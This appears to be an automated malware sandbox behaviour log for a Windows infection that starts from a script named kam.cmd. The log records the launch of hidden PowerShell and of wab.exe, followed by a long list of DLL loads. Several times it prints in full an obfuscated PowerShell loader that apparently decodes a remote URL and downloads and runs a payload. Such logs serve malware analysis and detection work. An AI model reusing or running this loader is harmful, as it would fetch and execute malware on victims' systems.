Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0bhgphdw.1ud.ps1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1716
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5572
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\kam.cmd" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Sanguinarily='Sub';$Sanguinarily+='strin';$Colour = 1;$Sanguinarily+='g';Function Circuted($Kropsvisiteret26){$Blazer=$Kropsvisiteret26.Length-$Colour;For($Tvrfljte=5;$Tvrfljte -lt $Blazer;$Tvrfljte+=6){$Intraperitoneally+=$Kropsvisiteret26.$Sanguinarily.Invoke( $Tvrfljte, $Colour);}$Intraperitoneally;}function Udkrte($Udmatningens){ . ($Polarizer) ($Udmatningens);}$Ontological=Circuted 'AlenlMGynobo AnimzCopiei Dekll UnbrlKaramaD,esk/ Abso5 edrr.C.apt0Clemp Notc(Dru,nWunifoiNailenPr.madCo.seoUnbuiwSheepsfrste MetalNUnderTL ndq Prede1Scrip0Postt.Penty0 dra.;Gidsl Spnd,WP ddii.rembnBa ng6 ,ram4B roc;Rkebi RaasxTermt6 D.ej4 Kn.r;Ringt LassorDiscjvCa.bi:archt1Bicen2Aftgt1O,tol. Sile0Sulfo)Diver Prof.G,fglaePen,acFalk,k Fi,hoNethi/Admir2Encin0Griff1 Tram0Cytis0M,tro1lufti0Kben 1Mech, ForblFDr.gaigkantrD,mmee Forrf gelsoSlag,x Sia./Lande1 Un i2Denot1Baand. E eb0 Sost ';$Pullouts=Circuted ' Eva,U,epousLu tleNonderMange- MellACamorgbkarveTo.fun UnpotZeppe ';$Skraaremmens=Circuted 'Gim ehLusketSidettSamlepcalcas Bo.i: Circ/Lseti/TruthwbackfwRegiswUbesl. karisDec neineq nCo kadBerylsRiotep lichaadaptcJenh,eGlott.BademcA osto .aktmD.ght/HydropDecimrH,spioDamas/Homeod.aretlXerot/ DesiiVi li4Gjord1 FreeaLupan7 alvf6 Loes ';$Spisestel=Circuted 'Bolte>Cubin ';$Polarizer=Circuted 'S irriFlykkeRa,idxKonst ';$Spiegeleisen='Decephalize';$Thermoremanent12 = Circuted ' Hecte Frejc,vigehPrem,oUdtry Udska%Klemea FolkpNogggpAgnindgvenda.odsetRegloaarchi%Krimi\uv.asKunivelNonada mishv PalbeTal,yrOmop sGassl.B,dstUAposteDyppen Eino .verl& Sprj&Te,no Scane Kongc ModehPollaojejun Varu tWindi ';Udkrte (Circuted 'Nonsy$IndisgFeriel,anneoUgerabOutlaaAnti l,rist:WillyNMytolo,rocenun ersStilitBraktuUnsh d FascySurli=Kdest(BeforcProtom OverdVolde Flers/Unde.cDisin Whabb$ G,amTHjemmh araleScarvrSe uemUsnoboKardirRoeddePeri,mHenhraI,difnLurefegerman .omet ,lle1Over 2Sub.e) ,und ');Udkrte (Circuted 'averr$Luf,egFaerdlTaphvoBru.sbArchpa Flytl Diss:TurnePTautoaResigrGorinaSel.kpNonaroNrmeldRev,l=Co.on$AkkusSSuperk C enrActedaOplseaAf,kir ilmeDi tam gattm T.leeLrlinnSk,bssPopul. fyris U depsnedkl.alkiiAutontSofav( Baro$EnklaSHygroppiqueiheav,sMeteoeOpbudsHals tBie.dekamm.lDydsk).orsv ');$Skraaremmens=$Parapod[0];$Kriminalromans= (Circuted 'Orgel$Zonopgun,erlUdstoobrdskbBostra V,sslUnbal:PositAAabnin.airbdVect,eUmedgfPagi.aP ohidVandleFlagsrArgene CactnRhota=CykelNEppieeDalr wNitzh-UdradO SletbPaaklj,oacceRabarcSlumptSmurr DiplaSUncolyPil.rsCattatB.sageEjendmF rda. SvigNSprngeBeslutZapti. Co,dWHusbaegan,tbHypocCTopollOestriThumbe Bi on Skldt');$Kriminalromans+=$Nonstudy[1];Udkrte ($Kriminalromans);Udkrte (Circuted 'Fiksp$U,derAOmstinHampsdhyposeI iqufOlo,ea Rectd,rinteStudirUndsae.zarinAlphi. UtilHSaccaeHesseaDiaspd SbireFilmar PttssSemec[Tknin$ VirkP,pdrauBestilEmbralExpeloskraluOpsamtGamblsCorru] Mill=gente$ComorO MidtnUfordtspecio Ef el C lio Fodgg.valmi Uns.cIstanaKaravlSlag. ');$Ame
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klavers.Uen && echo t"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Sanguinarily='Sub';$Sanguinarily+='strin';$Colour = 1;$Sanguinarily+='g';Function Circuted($Kropsvisiteret26){$Blazer=$Kropsvisiteret26.Length-$Colour;For($Tvrfljte=5;$Tvrfljte -lt $Blazer;$Tvrfljte+=6){$Intraperitoneally+=$Kropsvisiteret26.$Sanguinarily.Invoke( $Tvrfljte, $Colour);}$Intraperitoneally;}function Udkrte($Udmatningens){ . ($Polarizer) ($Udmatningens);}$Ontological=Circuted 'AlenlMGynobo AnimzCopiei Dekll UnbrlKaramaD,esk/ Abso5 edrr.C.apt0Clemp Notc(Dru,nWunifoiNailenPr.madCo.seoUnbuiwSheepsfrste MetalNUnderTL ndq Prede1Scrip0Postt.Penty0 dra.;Gidsl Spnd,WP ddii.rembnBa ng6 ,ram4B roc;Rkebi RaasxTermt6 D.ej4 Kn.r;Ringt LassorDiscjvCa.bi:archt1Bicen2Aftgt1O,tol. Sile0Sulfo)Diver Prof.G,fglaePen,acFalk,k Fi,hoNethi/Admir2Encin0Griff1 Tram0Cytis0M,tro1lufti0Kben 1Mech, ForblFDr.gaigkantrD,mmee Forrf gelsoSlag,x Sia./Lande1 Un i2Denot1Baand. E eb0 Sost ';$Pullouts=Circuted ' Eva,U,epousLu tleNonderMange- MellACamorgbkarveTo.fun UnpotZeppe ';$Skraaremmens=Circuted 'Gim ehLusketSidettSamlepcalcas Bo.i: Circ/Lseti/TruthwbackfwRegiswUbesl. karisDec neineq nCo kadBerylsRiotep lichaadaptcJenh,eGlott.BademcA osto .aktmD.ght/HydropDecimrH,spioDamas/Homeod.aretlXerot/ DesiiVi li4Gjord1 FreeaLupan7 alvf6 Loes ';$Spisestel=Circuted 'Bolte>Cubin ';$Polarizer=Circuted 'S irriFlykkeRa,idxKonst ';$Spiegeleisen='Decephalize';$Thermoremanent12 = Circuted ' Hecte Frejc,vigehPrem,oUdtry Udska%Klemea FolkpNogggpAgnindgvenda.odsetRegloaarchi%Krimi\uv.asKunivelNonada mishv PalbeTal,yrOmop sGassl.B,dstUAposteDyppen Eino .verl& Sprj&Te,no Scane Kongc ModehPollaojejun Varu tWindi ';Udkrte (Circuted 'Nonsy$IndisgFeriel,anneoUgerabOutlaaAnti l,rist:WillyNMytolo,rocenun ersStilitBraktuUnsh d FascySurli=Kdest(BeforcProtom OverdVolde Flers/Unde.cDisin Whabb$ G,amTHjemmh araleScarvrSe uemUsnoboKardirRoeddePeri,mHenhraI,difnLurefegerman .omet ,lle1Over 2Sub.e) ,und ');Udkrte (Circuted 'averr$Luf,egFaerdlTaphvoBru.sbArchpa Flytl Diss:TurnePTautoaResigrGorinaSel.kpNonaroNrmeldRev,l=Co.on$AkkusSSuperk C enrActedaOplseaAf,kir ilmeDi tam gattm T.leeLrlinnSk,bssPopul. fyris U depsnedkl.alkiiAutontSofav( Baro$EnklaSHygroppiqueiheav,sMeteoeOpbudsHals tBie.dekamm.lDydsk).orsv ');$Skraaremmens=$Parapod[0];$Kriminalromans= (Circuted 'Orgel$Zonopgun,erlUdstoobrdskbBostra V,sslUnbal:PositAAabnin.airbdVect,eUmedgfPagi.aP ohidVandleFlagsrArgene CactnRhota=CykelNEppieeDalr wNitzh-UdradO SletbPaaklj,oacceRabarcSlumptSmurr DiplaSUncolyPil.rsCattatB.sageEjendmF rda. SvigNSprngeBeslutZapti. Co,dWHusbaegan,tbHypocCTopollOestriThumbe Bi on Skldt');$Kriminalromans+=$Nonstudy[1];Udkrte ($Kriminalromans);Udkrte (Circuted 'Fiksp$U,derAOmstinHampsdhyposeI iqufOlo,ea Rectd,rinteStudirUndsae.zarinAlphi. UtilHSaccaeHesseaDiaspd SbireFilmar PttssSemec[Tknin$ VirkP,pdrauBestilEmbralExpeloskraluOpsamtGamblsCorru] Mill=gente$ComorO MidtnUfordtspecio Ef el C lio Fodgg.valmi Uns.cI
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klavers.Uen && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Sanguinarily='Sub';$Sanguinarily+='strin';$Colour = 1;$Sanguinarily+='g';Function Circuted($Kropsvisiteret26){$Blazer=$Kropsvisiteret26.Length-$Colour;For($Tvrfljte=5;$Tvrfljte -lt $Blazer;$Tvrfljte+=6){$Intraperitoneally+=$Kropsvisiteret26.$Sanguinarily.Invoke( $Tvrfljte, $Colour);}$Intraperitoneally;}function Udkrte($Udmatningens){ . ($Polarizer) ($Udmatningens);}$Ontological=Circuted 'AlenlMGynobo AnimzCopiei Dekll UnbrlKaramaD,esk/ Abso5 edrr.C.apt0Clemp Notc(Dru,nWunifoiNailenPr.madCo.seoUnbuiwSheepsfrste MetalNUnderTL ndq Prede1Scrip0Postt.Penty0 dra.;Gidsl Spnd,WP ddii.rembnBa ng6 ,ram4B roc;Rkebi RaasxTermt6 D.ej4 Kn.r;Ringt LassorDiscjvCa.bi:archt1Bicen2Aftgt1O,tol. Sile0Sulfo)Diver Prof.G,fglaePen,acFalk,k Fi,hoNethi/Admir2Encin0Griff1 Tram0Cytis0M,tro1lufti0Kben 1Mech, ForblFDr.gaigkantrD,mmee Forrf gelsoSlag,x Sia./Lande1 Un i2Denot1Baand. E eb0 Sost ';$Pullouts=Circuted ' Eva,U,epousLu tleNonderMange- MellACamorgbkarveTo.fun UnpotZeppe ';$Skraaremmens=Circuted 'Gim ehLusketSidettSamlepcalcas Bo.i: Circ/Lseti/TruthwbackfwRegiswUbesl. karisDec neineq nCo kadBerylsRiotep lichaadaptcJenh,eGlott.BademcA osto .aktmD.ght/HydropDecimrH,spioDamas/Homeod.aretlXerot/ DesiiVi li4Gjord1 FreeaLupan7 alvf6 Loes ';$Spisestel=Circuted 'Bolte>Cubin ';$Polarizer=Circuted 'S irriFlykkeRa,idxKonst ';$Spiegeleisen='Decephalize';$Thermoremanent12 = Circuted ' Hecte Frejc,vigehPrem,oUdtry Udska%Klemea FolkpNogggpAgnindgvenda.odsetRegloaarchi%Krimi\uv.asKunivelNonada mishv PalbeTal,yrOmop sGassl.B,dstUAposteDyppen Eino .verl& Sprj&Te,no Scane Kongc ModehPollaojejun Varu tWindi ';Udkrte (Circuted 'Nonsy$IndisgFeriel,anneoUgerabOutlaaAnti l,rist:WillyNMytolo,rocenun ersStilitBraktuUnsh d FascySurli=Kdest(BeforcProtom OverdVolde Flers/Unde.cDisin Whabb$ G,amTHjemmh araleScarvrSe uemUsnoboKardirRoeddePeri,mHenhraI,difnLurefegerman .omet ,lle1Over 2Sub.e) ,und ');Udkrte (Circuted 'averr$Luf,egFaerdlTaphvoBru.sbArchpa Flytl Diss:TurnePTautoaResigrGorinaSel.kpNonaroNrmeldRev,l=Co.on$AkkusSSuperk C enrActedaOplseaAf,kir ilmeDi tam gattm T.leeLrlinnSk,bssPopul. fyris U depsnedkl.alkiiAutontSofav( Baro$EnklaSHygroppiqueiheav,sMeteoeOpbudsHals tBie.dekamm.lDydsk).orsv ');$Skraaremmens=$Parapod[0];$Kriminalromans= (Circuted 'Orgel$Zonopgun,erlUdstoobrdskbBostra V,sslUnbal:PositAAabnin.airbdVect,eUmedgfPagi.aP ohidVandleFlagsrArgene CactnRhota=CykelNEppieeDalr wNitzh-UdradO SletbPaaklj,oacceRabarcSlumptSmurr DiplaSUncolyPil.rsCattatB.sageEjendmF rda. SvigNSprngeBeslutZapti. Co,dWHusbaegan,tbHypocCTopollOestriThumbe Bi on Skldt');$Kriminalromans+=$Nonstudy[1];Udkrte ($Kriminalromans);Udkrte (Circuted 'Fiksp$U,derAOmstinHampsdhyposeI iqufOlo,ea Rectd,rinteStudirUndsae.zarinAlphi. UtilHSaccaeHesseaDiaspd SbireFilmar PttssSemec[Tknin$ VirkP,pdrauBestilEmbralExpeloskraluOpsamtGamblsCorru] Mill=gente$ComorO MidtnUfordtspecio Ef el C lio Fodgg.valmi Uns.cIstanaKaravlSlag. ');$Ame Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klavers.Uen && echo t" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Sanguinarily='Sub';$Sanguinarily+='strin';$Colour = 1;$Sanguinarily+='g';Function Circuted($Kropsvisiteret26){$Blazer=$Kropsvisiteret26.Length-$Colour;For($Tvrfljte=5;$Tvrfljte -lt $Blazer;$Tvrfljte+=6){$Intraperitoneally+=$Kropsvisiteret26.$Sanguinarily.Invoke( $Tvrfljte, $Colour);}$Intraperitoneally;}function Udkrte($Udmatningens){ . ($Polarizer) ($Udmatningens);}$Ontological=Circuted 'AlenlMGynobo AnimzCopiei Dekll UnbrlKaramaD,esk/ Abso5 edrr.C.apt0Clemp Notc(Dru,nWunifoiNailenPr.madCo.seoUnbuiwSheepsfrste MetalNUnderTL ndq Prede1Scrip0Postt.Penty0 dra.;Gidsl Spnd,WP ddii.rembnBa ng6 ,ram4B roc;Rkebi RaasxTermt6 D.ej4 Kn.r;Ringt LassorDiscjvCa.bi:archt1Bicen2Aftgt1O,tol. Sile0Sulfo)Diver Prof.G,fglaePen,acFalk,k Fi,hoNethi/Admir2Encin0Griff1 Tram0Cytis0M,tro1lufti0Kben 1Mech, ForblFDr.gaigkantrD,mmee Forrf gelsoSlag,x Sia./Lande1 Un i2Denot1Baand. E eb0 Sost ';$Pullouts=Circuted ' Eva,U,epousLu tleNonderMange- MellACamorgbkarveTo.fun UnpotZeppe ';$Skraaremmens=Circuted 'Gim ehLusketSidettSamlepcalcas Bo.i: Circ/Lseti/TruthwbackfwRegiswUbesl. karisDec neineq nCo kadBerylsRiotep lichaadaptcJenh,eGlott.BademcA osto .aktmD.ght/HydropDecimrH,spioDamas/Homeod.aretlXerot/ DesiiVi li4Gjord1 FreeaLupan7 alvf6 Loes ';$Spisestel=Circuted 'Bolte>Cubin ';$Polarizer=Circuted 'S irriFlykkeRa,idxKonst ';$Spiegeleisen='Decephalize';$Thermoremanent12 = Circuted ' Hecte Frejc,vigehPrem,oUdtry Udska%Klemea FolkpNogggpAgnindgvenda.odsetRegloaarchi%Krimi\uv.asKunivelNonada mishv PalbeTal,yrOmop sGassl.B,dstUAposteDyppen Eino .verl& Sprj&Te,no Scane Kongc ModehPollaojejun Varu tWindi ';Udkrte (Circuted 'Nonsy$IndisgFeriel,anneoUgerabOutlaaAnti l,rist:WillyNMytolo,rocenun ersStilitBraktuUnsh d FascySurli=Kdest(BeforcProtom OverdVolde Flers/Unde.cDisin Whabb$ G,amTHjemmh araleScarvrSe uemUsnoboKardirRoeddePeri,mHenhraI,difnLurefegerman .omet ,lle1Over 2Sub.e) ,und ');Udkrte (Circuted 'averr$Luf,egFaerdlTaphvoBru.sbArchpa Flytl Diss:TurnePTautoaResigrGorinaSel.kpNonaroNrmeldRev,l=Co.on$AkkusSSuperk C enrActedaOplseaAf,kir ilmeDi tam gattm T.leeLrlinnSk,bssPopul. fyris U depsnedkl.alkiiAutontSofav( Baro$EnklaSHygroppiqueiheav,sMeteoeOpbudsHals tBie.dekamm.lDydsk).orsv ');$Skraaremmens=$Parapod[0];$Kriminalromans= (Circuted 'Orgel$Zonopgun,erlUdstoobrdskbBostra V,sslUnbal:PositAAabnin.airbdVect,eUmedgfPagi.aP ohidVandleFlagsrArgene CactnRhota=CykelNEppieeDalr wNitzh-UdradO SletbPaaklj,oacceRabarcSlumptSmurr DiplaSUncolyPil.rsCattatB.sageEjendmF rda. SvigNSprngeBeslutZapti. Co,dWHusbaegan,tbHypocCTopollOestriThumbe Bi on Skldt');$Kriminalromans+=$Nonstudy[1];Udkrte ($Kriminalromans);Udkrte (Circuted 'Fiksp$U,derAOmstinHampsdhyposeI iqufOlo,ea Rectd,rinteStudirUndsae.zarinAlphi. UtilHSaccaeHesseaDiaspd SbireFilmar PttssSemec[Tknin$ VirkP,pdrauBestilEmbralExpeloskraluOpsamtGamblsCorru] Mill=gente$ComorO MidtnUfordtspecio Ef el C lio Fodgg.valmi Uns.cI Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klavers.Uen && echo t" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskflowdataengine.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cdp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dsreg.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
